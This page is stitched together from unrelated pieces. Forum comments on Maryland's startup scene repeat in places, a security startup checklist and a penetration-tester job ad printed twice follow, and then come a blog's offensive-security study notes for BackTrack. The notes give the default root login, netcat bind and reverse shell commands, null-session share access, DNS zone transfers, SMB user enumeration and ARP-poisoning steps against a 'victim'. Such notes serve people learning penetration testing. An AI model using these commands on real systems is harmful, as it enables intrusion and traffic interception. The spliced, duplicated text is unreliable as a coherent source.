I implore you not to neglect other parts of Maryland's Internet tech economy, because it's product companies like Advertising.com, BillMeLater, Millenial Media, Localist, Ipiqi, Common Curriculum, Figure53, Replyz, Deconstruct Media, and a bunch of others I can't think of right now that are building a new, sustainable post-industrial base in our state.

####

I don't think I have as much government contractor experience as you do, Mike, but in my limited experience, these facts are all too true. And the worse news is that many of our region's big IT employers are more similar to government contracting than they are to product companies!

I've worked at places where these things are the norm: lack of admin rights to your own equipment, not being able to telecommute (for political as well as technical reasons), and working on long, slow, boring, wasteful release cycles. How can we convince the smart folks who feel "stuck" in these positions to get a taste for and contribute to the "new economy" companies?

I'd like to think the first steps for these people could be as follows:

1. get involved with after-hours local user groups and start networking. Join meetup.com. Follow local leaders on twitter. Twitter is not a toy. It's an amazing platform that brings you closer to others.

2. occasionally cowork remotely with others - even if you have to take a vacation day to do it. I know this is a hard sell, but it might be hard to see the value of coworking until you've done it a few times. Even if you're just poking around with new tech.

3. start a side project. There's no better why to flex your skills, and it might just grow into something bigger.

I've never been happier since I left that corporate IT world and started working on smaller, more vibrant projects. Thanks Mike for sharing your thoughts!
###

If you're a security and startup junkie, go do a security startup! I'm always happy to help folks looking to start security companies (msg @dugsong), and for more general startup mojo, be sure to check out @davetroy and Beehive Baltimore (which, incidentally, has some security startups right next door :-)

####
@Furball - it's hard to say. Are you a uniformed member of the Air Force or a civilian? Certainly I have found the leadership ethos and the work ethic of the military extremely useful in a startup. There's a certain self-starting "roll up your sleeves and get the job done no matter what, don't whine and ask me a bunch of questions" dedication to mission that you get from military service that is optimal for a startup environment.

Always during my military and civilian time working for DOD, I was finding way to write code. I wrote a 6K Perl script at one job (it started out as a 100 line helper then grew out of control, without me ever sitting down to design something good). I definitely got to play with some awesome and interesting technology. So I gained some generically useful programming experience, but it didn't really give me much preparation for building products on the web, except that I'm a bit more wary of getting hacked than maybe the average programmer is, since I know firsthand what a motivated attacker can accomplish.

What really shocked me out of the rut I was in was learning about Ruby and Rails and various open source projects by reading blogs. I stumbled onto Paul Graham's blog and that's where I learned about startup culture. The rest was history.

Not knowing you personally my general advice would be "why not get started now"? Are you going to be more risk-tolerant three years from now? Likely you will be even more used to the steady salary and benefits than you are now.

The last few posts on @Furball - it's hard to say. Are you a uniformed member of the Air Force or a civilian? Certainly I have found the leadership ethos and the work ethic of the military extremely useful in a startup. There's a certain self-starting "roll up your sleeves and get the job done no matter what, don't whine and ask me a bunch of questions" dedication to mission that you get from military service that is optimal for a startup environment.

Always during my military and civilian time working for DOD, I was finding way to write code. I wrote a 6K Perl script at one job (it started out as a 100 line helper then grew out of control, without me ever sitting down to design something good). I definitely got to play with some awesome and interesting technology. So I gained some generically useful programming experience, but it didn't really give me much preparation for building products on the web, except that I'm a bit more wary of getting hacked than maybe the average programmer is, since I know firsthand what a motivated attacker can accomplish.

What really shocked me out of the rut I was in was learning about Ruby and Rails and various open source projects by reading blogs. I stumbled onto Paul Graham's blog and that's where I learned about startup culture. The rest was history.

Not knowing you personally my general advice would be "why not get started now"? Are you going to be more risk-tolerant three years from now? Likely you will be even more used to the steady salary and benefits than you are now.

The last few posts on http://davetroy.com are all about this getting started issue...good luck!

#####
The 10 Steps of Cyber Security Startups

1.Business Cyber Risk Analysis
2.Embrace Security in Your Culture
3.Select the Right Platforms
4.Email is the Master Key
5.Your Web Site is the Front Door
6.Secure Coding
7.Control the Internal Network
8.Physical Security
9.Plan for Failure
10.Be Open with the Public

####

Security Consultant

To assist Nettitude in delivering security engagements of various types, e.g. penetration tests, PCI, etc.

A Security Consultant is expected to keep up to date with the latest security developments, news and techniques.

Security Consultants will receive special focus from more senior staff in order to assist their progress, but emphasis is also placed on self-study and a desire to learn.

Security Consultants are expected to own and run their own security engagements. This includes the full lifecycle of an engagement from kick off call, testing, report creation, report delivery to debrief. There may be a requirement to lead small to medium projects and to help mentor Junior Security Consultants.

A Security Consultant must work towards attaining mid to upper level industry certification such as the OSCP, for which Nettitude will provide support.

Security Consultant

To assist Nettitude in delivering security engagements of various types, e.g. penetration tests, PCI, etc.

A Security Consultant is expected to keep up to date with the latest security developments, news and techniques.

Security Consultants will receive special focus from more senior staff in order to assist their progress, but emphasis is also placed on self-study and a desire to learn.

Security Consultants are expected to own and run their own security engagements. This includes the full lifecycle of an engagement from kick off call, testing, report creation, report delivery to debrief. There may be a requirement to lead small to medium projects and to help mentor Junior Security Consultants.

A Security Consultant must work towards attaining mid to upper level industry certification such as the OSCP, for which Nettitude will provide support.

The following list is indicative of the overall expectations of the role (not exhaustive):

    Deliver penetration testing and other related security activities, for example PCI DSS-ASV scans, etc.
    To perform kick off calls, wash up calls, email responses and debrief for each assigned engagement.
    To help develop client relationships and to provide professional consultative style engagements.
    Write full and thorough reports for each engagement that show rapid and constant improvement, based on comments from QA and peers.
    Through self-study and mentorship the individual must demonstrate an ability to rapidly verse themselves in a wide variety of IT Security related skills.
    Willingness to mentor Junior Security Consultants where appropriate and/or requested.
    To lead small to medium sized projects as deemed appropriate by Nettitude.
    Where appropriate and/or requested, provide labs for the Nettitude CTF, deliver effective and useful clinic days and to take part in any other activity which promotes the team’s cohesion and ability to progress.
    When requested, to provide technical analysis of current IT Security related events, especially for the purpose of media coverage.
    When requested, to prepare and run the weekly penetration testing team meeting in an effective manner and using the provided standard template and report any concerns raised to management.
    To assist in Security Testing related presales activities, providing technical assessment of scope, principal security concerns and testing methodology to Account Manager.
    When requested, to formally review reports submitted to Quality Assurance to the standard expected by Nettitude.
    To assist Management in performing other tasks as requested and required for effective business function.

Monday, December 13, 2021

Hacking BB

Table of Contents

Introduction............................................................................................................. 5

BackTrack Basics..................................................................................................... 6

XWindow............................................................................................................................................. 6

Set IP Through DHCP........................................................................................................................ 6

Set Static IP.......................................................................................................................................... 6

Start SSH Service................................................................................................................................ 6

Start Apache Service........................................................................................................................... 7

Start TFTP Service.............................................................................................................................. 7

Starting VNC Service.......................................................................................................................... 7

Checking Open Ports.......................................................................................................................... 7

Bash Basics............................................................................................................... 7

Commands........................................................................................................................................... 7

Special Characters............................................................................................................................... 8

Asterisk............................................................................................................................................. 8

Question Mark.................................................................................................................................. 8

Arrows.............................................................................................................................................. 9

Double Arrows................................................................................................................................. 9

Pipe................................................................................................................................................... 9

Grep...................................................................................................................................................... 9

Cut...................................................................................................................................................... 10

Sort..................................................................................................................................................... 10

Scripting............................................................................................................................................. 10

Netcat...................................................................................................................... 10

Netcat Client Connection.................................................................................................................. 10

Netcat Server Connection................................................................................................................. 10

Bind Shells.......................................................................................................................................... 11

Reverse Shells..................................................................................................................................... 11

Netcat vs. nc.traditional..................................................................................................................... 11

Wireshark............................................................................................................... 11

Using................................................................................................................................................... 11

The TCP “3-Way Handshake” (Getting a Website)....................................................................... 12

Filters.................................................................................................................................................. 12

Password Grabbing........................................................................................................................... 12

Reconnaissance ..................................................................................................... 12

Google................................................................................................................................................. 13

Google Symbols.................................................................................................................................. 13

Quotes............................................................................................................................................. 13

Asterisk........................................................................................................................................... 14

Minus.............................................................................................................................................. 14

Google Operators............................................................................................................................... 14

intitle............................................................................................................................................... 14

inurl................................................................................................................................................. 14

site................................................................................................................................................... 14

cache............................................................................................................................................... 14

“Evil” Google Searches..................................................................................................................... 15

Google Dorks..................................................................................................................................... 15

Service Enumeration.............................................................................................. 15

Whois Enumeration.......................................................................................................................... 15

DNS Server Enumeration................................................................................................................. 15

Host Lookup...................................................................................................................................... 16

Reverse Host Lookup........................................................................................................................ 16

DNS Zone Transfers.......................................................................................................................... 16

SNMP Enumeration.......................................................................................................................... 16

SMTP Enumeration.......................................................................................................................... 17

OS Fingerprinting............................................................................................................................. 17

NetBIOS Enumeration...................................................................................................................... 17

Active Directory Enumeration......................................................................................................... 17

SMB Enumeration............................................................................................................................ 17

Windows Null Sessions.................................................................................................................. 17

enum4linux..................................................................................................................................... 18

smb-enum-users.............................................................................................................................. 18

smb-enum-shares............................................................................................................................ 18

Maltego................................................................................................................... 18

Port Scanning........................................................................................................ 18

Theory................................................................................................................................................ 18

Types................................................................................................................................................... 18

Problems............................................................................................................................................. 19

Ping Assumptions........................................................................................................................... 19

UDP Scans Problems...................................................................................................................... 19

nmap................................................................................................................................................... 20

NSE................................................................................................................................................ 20

zenmap............................................................................................................................................... 20

Unicorn Scan..................................................................................................................................... 20

autoscan.............................................................................................................................................. 21

ARP Spoofing........................................................................................................ 21

Theory................................................................................................................................................ 21

Limitations......................................................................................................................................... 21

Ettercap.............................................................................................................................................. 22

DNS Spoofing.................................................................................................................................... 22

SSLStrip............................................................................................................................................. 22

OS Vulnerabilities................................................................................................... 23

Vulnerability Assessment................................................................................................................... 23

Web Server Vulnerabilities............................................................................................................... 23

Database Vulnerabilities.................................................................................................................... 24

TCP Stack Vulnerabilities................................................................................................................. 24

Application Vulnerabilities................................................................................................................ 25

Denial of Service..................................................................................................... 25

Theory................................................................................................................................................ 25

Flood Attacks..................................................................................................................................... 25

Syn Flood....................................................................................................................................... 25

Mitigation for SYN Floods............................................................................................................. 25

UDP Flood...................................................................................................................................... 26

Mitigation for UDP Floods............................................................................................................. 26

ICMP Flood.................................................................................................................................... 26

Mitigation for ICMP Floods............................................................................................................ 26

Smurf Attack................................................................................................................................... 26

Mitigation for Smurf Attacks........................................................................................................... 26

Ping Of Death.................................................................................................................................... 26

Teardrop............................................................................................................................................. 26

LOIC.................................................................................................................................................. 27

SSL DoS............................................................................................................................................. 27

Exploits................................................................................................................... 27

Compiling........................................................................................................................................... 27

Resources........................................................................................................................................... 27

Remote Administration Tools................................................................................ 27

Theory................................................................................................................................................ 28

Uses..................................................................................................................................................... 28

Darkcomet.......................................................................................................................................... 28

CyberGate.......................................................................................................................................... 28

Solitude .............................................................................................................................................. 28

Cerberus............................................................................................................................................. 28

Blackshades........................................................................................................................................ 28

Metasploit............................................................................................................... 28

msfconsole.......................................................................................................................................... 28

msfcli................................................................................................................................................... 29

msfweb................................................................................................................................................ 29

msfgui................................................................................................................................................. 29

Updating Metasploit.......................................................................................................................... 29

Exploitation........................................................................................................................................ 29

Payloads............................................................................................................................................. 29

Meterpreter........................................................................................................................................ 29

Encoders............................................................................................................................................. 29

Auxiliary............................................................................................................................................. 29

Credential Collection......................................................................................................................... 29

db_autopwn....................................................................................................................................... 29

Browser Autopwn............................................................................................................................. 30

Anti-virus Bypass................................................................................................... 30

Theory................................................................................................................................................ 30

Droppers............................................................................................................................................ 30

Theory............................................................................................................................................ 30

Crypters............................................................................................................................................. 30

Theory............................................................................................................................................ 30

The Encrypter................................................................................................................................. 30

The Stub......................................................................................................................................... 31

Antis............................................................................................................................................... 31

Junk Code.......................................................................................................................................... 31

Buffer Overflows.................................................................................................... 31

Theory................................................................................................................................................ 31

Protections.......................................................................................................................................... 32

Common Attacks............................................................................................................................... 32

Problems............................................................................................................................................. 33

Fuzzers............................................................................................................................................... 33

Web Based Attacks................................................................................................. 33

Zero Frames and Zero Images......................................................................................................... 33

Command Execution......................................................................................................................... 34

Cross Site Request Forgery.............................................................................................................. 34

File Inclusion...................................................................................................................................... 34

Local............................................................................................................................................... 34

Remote............................................................................................................................................ 35

SQL Injections................................................................................................................................... 35

URL................................................................................................................................................ 35

Authentication Bypass.................................................................................................................... 36

Blind............................................................................................................................................... 37

SQLmap......................................................................................................................................... 37

Cross Site Scripting (XSS)................................................................................................................ 37

Non-Persistent................................................................................................................................. 38

Persistent......................................................................................................................................... 38

Web Based Exploitation Frameworks................................................................... 38

OWASP Mantra................................................................................................................................. 38

Port Tunneling....................................................................................................... 38

Theory................................................................................................................................................ 39

HTTP CONNECT Tunneling........................................................................................................... 39

SSL Tunneling.................................................................................................................................... 39

stunnel............................................................................................................................................. 39

SOCKS............................................................................................................................................... 40

SSH Tunneling................................................................................................................................... 40

Local............................................................................................................................................... 40

Remote............................................................................................................................................ 40

Dynamic......................................................................................................................................... 40

Tor.......................................................................................................................... 40

Theory................................................................................................................................................ 40

Installing............................................................................................................................................. 41

Using................................................................................................................................................... 41

Authentication Vulnerabilities............................................................................... 41

Theory................................................................................................................................................ 41

Problems With Networks.................................................................................................................. 41

Plain Text............................................................................................................................................ 41

Hashing Systems................................................................................................................................ 41

MD4............................................................................................................................................... 41

DES................................................................................................................................................ 41

MD5............................................................................................................................................... 42

SHA1.............................................................................................................................................. 42

NTLM............................................................................................................................................ 42

MYSQL.......................................................................................................................................... 42

Challenge Systems............................................................................................................................. 42

Uneven Algorithms............................................................................................................................ 42

Here Be Dragons............................................................................................................................... 43

Password Attacks................................................................................................... 43

Theory................................................................................................................................................ 43

Strong Vs. Weak Passwords............................................................................................................. 44

Brute Force........................................................................................................................................ 44

Dictionary........................................................................................................................................... 44

Rainbow Tables................................................................................................................................. 45

GPU Cracking................................................................................................................................... 45

Misconceptions................................................................................................................................... 45

hydra.................................................................................................................................................. 46

xhydra................................................................................................................................................ 46

medusa................................................................................................................................................ 46

ncrack................................................................................................................................................. 46

Wireless Attacks..................................................................................................... 46

Theory................................................................................................................................................ 46

WEP................................................................................................................................................... 47

WEP Cracking................................................................................................................................... 47

Cafe Latte....................................................................................................................................... 47

ARP Replay.................................................................................................................................... 47

Korek's Chop Chop Attack............................................................................................................. 47

Hirte Attack..................................................................................................................................... 48

Fragmentation Attack...................................................................................................................... 48

WPA................................................................................................................................................... 48

WPA Cracking................................................................................................................................... 48

WPA2................................................................................................................................................. 48

WPA2 Cracking................................................................................................................................ 48

WPS.................................................................................................................................................... 48

WPS Cracking................................................................................................................................... 48

Wash............................................................................................................................................... 49

Reaver............................................................................................................................................. 49

DoS Attacks........................................................................................................................................ 49

Deauthentication Attacks................................................................................................................ 49

Man In The Middle........................................................................................................................... 49

Social Engineering................................................................................................. 49

Introduction

This resource is a collection of notes that I took over the past year relating to the subject of computer security. This note collection will not teach you by itself. It is meant to be more of a refresher, guide, and quick resource to help people learn.

To use this please install BackTrack. Most of the tools are already installed and will make your life a whole lot easier.

I would also suggest brushing up on your Linux skills as they will be used heavily in this.

If you like this document, please help support the author and donate to him. The author needs to eat too. If you have any questions, my contacts are as follows.

Email – napalmfire.df@gmail.com

Skype – napalmfiredf

BackTrack Basics

BackTrack normally starts in command line mode.

The default log-in is

• User: root

• Pass: toor

XWindow

To begin using BackTrack we must start the GUI.

• startx

This will start KDE or GNOME depending on the version, however not all tools are GUI based, use Konsole for all tools. The /pentest/ directory has all the tools you will need.

Set IP Through DHCP

• dhcpcd [interface]

However in BT4 you must first install dhcpcd on new installations using apt-get install dhcpcd.

Set Static IP

• ifconfig [interface] [ip]/24

• route add default gw [gateway]

• echo nameserver [gateway] > /etc/resolv.conf

Start SSH Service

Go to Start → Services → SSH → Setup SSH

This will generate SSH keys and start service.

SSH port is 22.

• service ssh start

Start Apache Service

Go to Start → Services → HTTPD → Start HTTPD

HTTPD port is 80

• service httpd start

Start TFTP Service

• tftpd –daemon –port 69 /tmp/

or Start → Services → TFTP → Start TFTP - TFTP port is 69

Starting VNC Service

• vncserver

or Start → Services → VNC → Start VNC

VNC port is 5901 (Add +1 to port for every new connection)

Checking Open Ports

• netstat -ant | grep [port]

Netstat searches for open ports on host and grep filters results.

Bash Basics

BASH or the Bourne Again Shell is the terminal on which most Linux computers operate. This lets us pass commands directly to the OS, allowing us greater control and access.

Commands

The basic structure of a command:

• command argument argument argument

Here the command command is run, using argument as it's argument. A command is the program being run, an argument is the data that the user wishes to pass to that program. Not all programs need to receive data, some do one shot functions.

An example of a useful command:

• cat emails.txt

This runs the program “cat” and tells it to open emails.txt.

Another thing to be wary of is switches. Switches usually have a “-” or “--” in front. These are used to tell the program to operate a certain way, or to denote a specific field of input.

Consider:

• nmap -sV -sS 192.168.0.1

This line runs the program “nmap” and tells it to use the -sV and -sS functions in nmap on the IP 192.168.0.1.

Another example:

• cut -d” “ -f3 emails.txt

This would invoke the program”cut” and tell the program to use the -d with “ “ as an argument. It also tells it to use -f and send “3” as an argument to -f.

Special Characters

Certain characters has special meanings in BASH and are very useful to us when dealing with large amounts of data.

Asterisk

Asterisks are a character that replaces itself with all possible entries for a file. For instance, consider this directory listing.

• email-jodie.txt

• email-sam.txt

• email-unwanted.pdf

• junk.txt

• morejunk.txt

Lets say we want to cat all the text files with email in the name. We could go through and cat them one by one but, that would take too long. So instead we use the asterisk to fill in all possibilities.

• cat email*

While this would cat the files we did want, it will also cat email-unwanted.pdf because it was in our range of text. Let's try again, this time limiting it only to text files.

• cat email*.txt

This would cat only the files we want, ensuring no extra worthless data gets into our search.

Alternatively an even easier way to do this would to use:

• cat e*.txt

This would do the same exact thing, in much less characters.

Question Mark

Similar to the asterisk, however, limited to one character.

Consider this directory listing:

cats1.txt

cats2.txt

cats3.txt

cats1-backup.txt

cats2-backup.txt

cats3-backup.txt

Our goal is to cat all the files that aren't backups. If we were to use the star in this situation, it would return all the results, so we can use a question mark to search for files with only one letter from what we need.

• cat cats?.txt

Arrows

Arrows, sometimes refereed to as tacs. are used to write and read to a file from a command. For example, lets say that you wish to save the output of a program into a file. You can use the arrow to write that output directly to it, making your life easier.

• nmap 192.168.0.1 > file.txt

Here we take the output of nmap and stuff it into file.txt, allowing us to save the results of our scan. When doing this, if the file previously existed, it erases all the data in the file before adding the new data.

We can also read input from files.

• cut -d” “ -f3 < ip.txt

This would send the contents of ip.txt into the cut program.

Double Arrows

Double arrows, sometimes referred to as tac-tacs, are used to add data to an already existing file.

For example, lets say you wanted to add the result of a new nmap scan to a file you already created.

• nmap 192.168.0.1 > >file.txt

This would append to the file.

Pipe

The pipe is an extremely useful character and, is very useful for text manipulation, among other things. Pipe takes the output of one program and uses it as input for another.

For example:

• nmap 192.168.0.1 | grep “smb”

This would run nmap and then, send the output to grep to use how it pleases. This can be useful for handling huge lines of text (which we will see later when talking about cut and sort)

Grep

Grep is a program that will search text for a specific pattern, and then output only the lines which contain the pattern.

For instance, lets say we have a large configuration file and, we have an option that we need to find the value of. Using grep, we can search the configuration file for that text, and have it display the result.

• cat long.conf | grep “hard-to-find-value”

Cut

Cut is a program that is used to split text based on a delimiter. This allows us to quickly get text that might be several characters deep.

For example, examine this set of text.

id:user:password:email

1:admin:secret:admin@admin.com

Say we only want all the usernames, we could use : as a delimiter, and specify what field we want to get, which, in this example, would be two.

• cut -d':' -f2

This will output:

user

admin

Sort

Sort allows us to sort text but, is also has a nifty feature that allows us to remove duplicates.

Scripting

Netcat

Netcat – A tool used to write data directly to a TCP/UDP port. Can be in client mode or server mode.

Netcat Client Connection

This mode sets Netcat to client mode. This connects to a server through a port defined as an argument. This allows the client to receive and transmit data to the server.

• nc -v [ip] [port]

Netcat Server Connection

This mode sets Netcat to server mode. This allows clients to connect to that port and receive and transmit raw data.

• nc -lvvp [port]

Sending a File

• nc -vv [ip] [port] < [file]

Receiving a File

• nc -lvvp [port] > [file]

Bind Shells

Netcat has the ability to redirect the input and output of a console to a TCP/UDP port. This can allow remote administration. This is called a bind shell. This then allows a server to broadcast its shell to others.

Server

• nc -lvvp [port] -e [shell]

As a note Linux's shell is located at /bin/bash/ while Windows's shell is cmd.exe.

Client

• nc -v [ip] [port]

Now the shell is transmitted to the client when he connects to the server.

Reverse Shells

This works the reverse of a bind shell. This allows the client to transmit their shell to a server. This has the same effect as the bind shell.

Server

• nc -lvvp [port]

Client

• nc -v [ip] [port] -e [shell]

Netcat vs. nc.traditional

In some linux enviroments, nc might already be installed. However, this version is different from the actual version. To get the real version of netcat, use

• apt-get install nc.traditional

you will also have to replace nc with nc.traditional in the before commands.

Wireshark

Wireshark is a packet sniffer which can capture packets and display the contents of them.

Using

• wireshark &

This will put wireshark in the background of the console.

Once loaded, it is simple to use. Just select the interface you'd like to listen in on. Once in listening mode, Wireshark will capture all incoming packets on that interface.

The TCP “3-Way Handshake” (Getting a Website)

Wireshark displays packets captured by the most recent packet last. The list expands downward. Here, we can see a sample capture of the process of making a connection and getting a webpage through HTTP.

#	Source	Destination	Protocol	Info	Description
1	You	Gateway	DNS	Standard query of host	You ask the gateway where the host is.
2	Gateway	You	DNS	Standard query response [ip]	Gateway tells you IP Address.
3	You	Host	TCP	SYN	1^st part of 3 handshake.
4	Host	You	TCP	SYN, ACK	2^nd part of 3 handshake.
5	You	Host	TCP	ACK	3^rd part of 3 handshake.
6	You	Host	HTTP	GET/HTTP	Beginning of sending webpage

Filters

Filters let you exclude packets based on search patterns. For instance, lets say you'd like to only see traffic on port 1234. Filters will let you exclude anything that isn't on those ports.

• tcp.port==1234

Filters also support Boolean logic. For instance, lets say you'd like to see port traffic on both 1234 and 4321.

• tcp.port==1234 && tcp.port==4321

This will display both ports' traffic.

Password Grabbing

Reconnaissance

More info = Higher chance of success

Passive Reconnaissance – Stealthily gathering information in a non-intrusive way. There is little to no chance to being caught.

Active Reconnaissance – Gathering information in a way that is intrusive and may be detected by an IDS. There may be a medium to high risk of detection.

Look for:

• Names

• Numbers

• Emails

• Addresses

• Affiliates

• Links

• IP addresses

• Nameservers

• Site Maps

Google

Google crawls a huge host of web sites, often times crawling through poorly configured webservers. Using specific search terms we will be able to find things about webservers or, be able to increase our attack surface, through the information we gather here.

Some examples would be:

• Possible SQL injections

• Possible XSS attacks

• Webmail logins

• SQL Dumps

• Administration pages

• Web backdoors

• Misconfigured web applications

Google Symbols

Google symbols let us refine our search options, letting us quickly and efficiently get the data we need.

Quotes

• “search terms”

Putting a term in quotes only displays pages with that sequence of text. This is opposed to no quotes which will display all pages containing part or all of the text, regardless of sequence.

Asterisk

• * birds

The asterisk will fill in all possible terms for a sequence. For instance, the asterisk here will fill in all the different types of birds and much more, in an attempt to find your term.

Minus

• blue foot boobies -porn

The minus excludes pages with a specified terms. For example, this search excludes any pages with the term porn in it, since Google will display all pages containing boobies.

Google Operators

Google has many operators that can help us narrow our search results. Many of them will scour pages looking for the exact information we need, others can restrict data to certain types.

intitle

The intitle operator restricts search results to only pages that contain a pattern in the title. For example:

• intitle:”National Geographic” Africa

The above will display result from pages that have National Geographic in then title and also have Africa on the page. This is useful for finding admin pages, as well as file indexs.

inurl

The inurl operator lets us restrct to search terms that are in the URL of the result. Using this we can often find potentially vulnerable pages or specific admin login pages.

• inurl:admin.php login

site

The site operator lets us restrict results to that of a specific domain. This allows us to narrow our search tom a specific target.

• site:vulnerable.com inurl:admin.php login

cache

The cache operator lets us see the last version of a webpage crawled by Google. By using this we can often find results of a webpage that were deleted some time ago.

• cache:google.com

“Evil” Google Searches

I will only cover a few here, since the topic has almost endless searches. The idea of “evil” Google searches is to find pages that are vulnerable, have default passwords, or find caches of information.

These searches allow an attacker to search specific websites for vulnerabilities.

For example:

Let's look for default XAMPP installs.

Google Dorks

Service Enumeration

Service Enumeration is the technique of looking for open information about a targets ISP, nameservers, IP addresses, and running protocols.

Whois Enumeration

• whois [url/ip]

Gives:

• Web server admin

• Numbers

• Emails

• Nameservers

DNS Server Enumeration

• nslookup

Begins DNS Lookup

• >[website]

Gives DNS info on specified domain

• >set type=mx

Gives Mail Exchange servers

• >set type=ms

Gives mail server IPs.

Host Lookup

Use this to get an IP address for a domain.

• host [url]

You can also use the -t switch to specify type of server.

Look up nameservers for a specified host.

• host -t ns [url]

Look up mail exchange for a specified host.

• host -t mx [url]

Reverse Host Lookup

This lets you take an IP and reverse it into a domain. Using this we can often find out about the domains IP addresses are attached to.

• host [ip]

DNS Zone Transfers

DNS zone transfers are a problem existing is misconfigured DNS servers which, allow nameserver communication. With this, an attacker can get the entirety of an external network handed to them by just asking for a copy of the zone record.

We can perform these attacks using host. We first need a list of nameservers which, can be provided by using nslookup.

• host -l [victim url] [our url]

This will attempt a zone transfer to our own URL. If successful, it will give us all the IP – URL match-ups for us to use, exposing hidden subdomains to us.

This kind of attack might not always be successful and can be easily configured to be detected/

SNMP Enumeration

Simple Network Management Protocol is a UDP based protocol that monitors network attached devices. Its authentication method is using public and private keys. Public keys may not have all permissions, however, only read access is needed to enumerate. The public key is usually “public”.

• Weak authentication system.

• Vulnerable to IP-spoofing.

To begin using SNMP use the following command.

• snmpwalk -c [key] -v1 [ip] 1

SMTP Enumeration

Simple Mail Transfer Protocol handles outgoing email.

Checks if user is valid.

• vrfy [user]

OS Fingerprinting

OS Fingerprinting – Is the process of scanning open ports and banner grabbing to detect the OS.

Once used you can figure out what exploits to use. Nmap provides free OS detection.

• nmap -O [ip]

NetBIOS Enumeration

NetBIOS – Network Basic Input Output System is a forgotten technology that runs by default on most Windows computers. It provided early name resolution. This task is now more commonly handled by DNS but, NetBIOS still runs as a default service on most Windows computers.

NBTScan – Free NetBIOS scanner.

Active Directory Enumeration

Active Directory - Contains records of users, servers, sites, and workgroups.

Every account on the system has read permissions. It uses LDAP. Ldp.exe is commonly used to control AD. You can possibly authenticate with a Guest or null account.

It would only take one compromise to get all the AD info.

SMB Enumeration

SMB enumeration is extremely useful as Windows runs it as a default service. We can use this to find a list of users (Making password cracking easier), mount remote shares and, even run executables through it.

Windows Null Sessions

A windows null session is the ability to login to a Windows computer through SMB and view info about the computer. You do this by supplying a null user or password. Then you can mount shares from the computer.

To use it you must use the command line in Windows.

• net use \\share\ipc$ “” /USER: “”

If the command is successful the attacker can use the net view command to view information about the computer such as users, processes , services, and uptime.

You may also be able to gain C: drive access by going to Run → \\share\c$

enum4linux

enum4linux is a tool based off of a Windows tools called enum.exe. It carries many of the same features and is extremely comprehensive in it's data.

smb-enum-users

This script lets us enumerate the users on a remote Windows computer. This script is very similar to enum.exe for Windows.

• nmap -sS -sU --script smb-enum-users.nse -p U:127 T:139,445 [host]

WARNING! This script has two options lsaonly and samronly. samronly REQUIRES a real user account, not just guest. lsaonly requires only a guest account.

smb-enum-shares

This script lets us enumerate the shares of a remote windows computer.

Maltego

Port Scanning

Theory

Port Scanning - The technique of scanning for open ports to ascertain information about a target computer. It is the first action to take before attempting exploit. It is part of the information gathering phase. Can be intrusive and detected by an IDS

Packets – Information sent over the network in smaller chunks. Uses flags to indicate the type of packet. Flags can be mixed.

Types

Type	Meaning
Syn	Initial Packet(Begin handshake)
Ack	Acknowledgment(Reply for packet received)
Fin	Finish(Done with connection)
Urg	Urgent
Psh	Push
Rst	Reset(Sent to reset the TCP handshake)

TCP - Port that uses a 3-way handshake to identify open ports and begin data transfers.

UDP - A port that uses a stateless system. If the port is open there is no reply. If it is closed you get an ICMP ping.

Full Scan - Completes 3-way handshake. Is intrusive and easily detected but, reliable.

Half Scan/SYN Scan – Sends only syn packets and does not complete the handshake. This makes it harder to detect.

UDP Scan – Scans UDP ports. However it is unreliable because UDP is stateless. If the port is up there is no reply. If it is down source receives an ICMP unreachable.

Stealth Scan – Uses same method as syn scan but varies the frequency and timing and randomizes the ports scanned making it harder to detect.

Xmas Scan – Creates a malformed packet with PSH, FIN, and URG flags to scan a system. Doesn't work against Windows.

Ack Scan – Scanner sends ACK packets and receives a RST packet back. This shows the attacker which ports are open.

ICMP Scan – Very detectable ping scan. Rarely used because it is unreliable, inefficient ,and detectable.

Problems

Port scans often times are noisy and dangerous, doing one can make you an easy target for an IDS or firewall logging system.

Ping Assumptions

In most cases, unless told not to, scanners will attempt to ping the host before attempting a port scan. If it doesn't get a ping back the host is considered as “not alive”. This I a false assumption in some cases and can provide faulty scan results, telling you that computers are not alive that actually are and are just not responding to ping probes.

UDP Scans Problems

Since UDP scans are stateless, there can be issues with the detection process. For example, a firewall can be blocking probes to certain ports and, you'll never know.

It could also allow the data through but, not kill the ICMP Unreachable packet on its way out.

As a result, take UDP scans with a grain of salt, chances are, you aren't seeing the full picture.

nmap

Nmap runs a port scan on the specified IP.

• nmap -p [port] [ip]

Full port scan.

• nmap -p 1-65535 [ip]

OS detection

• nmap -O [ip]

Service versions scan

• nmap -sV [ip]

Comprehensive scan

• nmap -A [ip]

NSE

The nmap Scripting Engine is a tool which allows us to write and use scripts to aid us in our penetration testing goals. We used a script ealier in the SMB Enumeration section to attempt an enumeration of users on a system.

We can see the various .nse scripts included with nmap on their site, and we can also see them by going through the nmap scripts directory.

We can also attempt to use all scripts using this command:

• nmap --scripts all [ip]

zenmap

Zenmap is a nmap gui that will allow use to easily understand the sometimes overflow of data that nmap can provide.

Unicorn Scan

A scanning tool like nmap but, has a web GUI. (See Appendix for list of features)

• unicornscan [ip]

autoscan

ARP Spoofing

Theory

ARP - A protocol for finding a MAC address for a host whose IP is known. It consists of a Broadcast request phase, and a reply phase, and a conformation phase.

ARP cache - The table containing MAC-IP match ups.

ARP Spoofing(APR) - The technique used to poison ARP caches. A sniffer get ARP packets from a switch and proceeds to intercept them. Then it can route all network traffic to the attacker.

1. Host-A broadcasts on all ports . ARP Request

2. Host-B receives request and sends back reply. ARP Reply

3. Host-A sends conformation to Host-B

By listening in a sniffer could get all the MAC-IP match-ups on the network. by using this data we can reroute packets through our machine and then out to the destination.

It does this by actively listening then modifying standard ARP packets.

Victim Packet
	MAC	IP
Source	Attacker	Gateway
Destination	Victim	Victim
Gateway Packet
Source	Attacker	Victim
Destination	Gateway	Gateway

Limitations

Once in the attack stage, the attacker must reroute all traffic to the appropriate destinations while still poisoning the ARP cache. There are 5 rules about APR attacks.

1. APR only works on LANs.

2. Attacker must reroute packets unless a DoS attack is preferred.

3. Attacker must know where to reroute packets.

4. APR will slow down the network as you are adding another layer to the network.

5. APR must update constantly. If not, the computer will delete the entries if it ARP requests an address again.

6. An APR attack can not be done to computers connected to the main router themselves. This is because the router is able to intercept them before damage is done.

Also, APR attacks need to have some thought put into them.

1. One peer may be the Internet. If this is true you need to have the routing tables or be broadcasting.

2. There could be multiple entrance/exits on a LAN

3. There may be anti-APR protections.

Ettercap

Ettercap - A tool used for ARP spoofing.

Get hosts on a network

• Hosts -> Scan for hosts

• See list of Hosts

• Hosts -> Hosts lists

• Target 1 = Gateway

• Target 2 = Victim

• MITM->ARP Poisoning to begin APR.

DNS Spoofing

